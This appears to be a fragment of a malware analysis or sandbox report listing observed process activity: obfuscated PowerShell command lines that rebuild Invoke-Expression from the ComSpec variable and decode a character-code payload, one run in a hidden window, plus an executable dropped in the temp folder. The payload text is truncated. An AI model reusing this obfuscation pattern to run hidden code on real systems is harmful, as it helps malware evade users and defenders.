Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $EnV:CoMspec[4,24,25]-JOIn'')(-jOIn ( '112D0w61m39m34j23F116S105S116j58,49m35m121S59&54D62{49{55S32{116F38!53S58&48w59j57S111,112w17&6,32!6,27&50{116&105{116&58m49S35,121m59{54,62m49F55S32{1...
- %TEMP%\240963.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $EnV:CoMspec[4,24,25]-JOIn'')(-jOIn ( '112D0w61m39m34j23F116S105S116j58,49m35m121S59&54D62{49{55S32{116F38!53S58&48w59j57S111,112w17&6,32!6,27&50{116&105{116&58m49S35,121m59{54,62m49F55S32{1...' (with hidden window)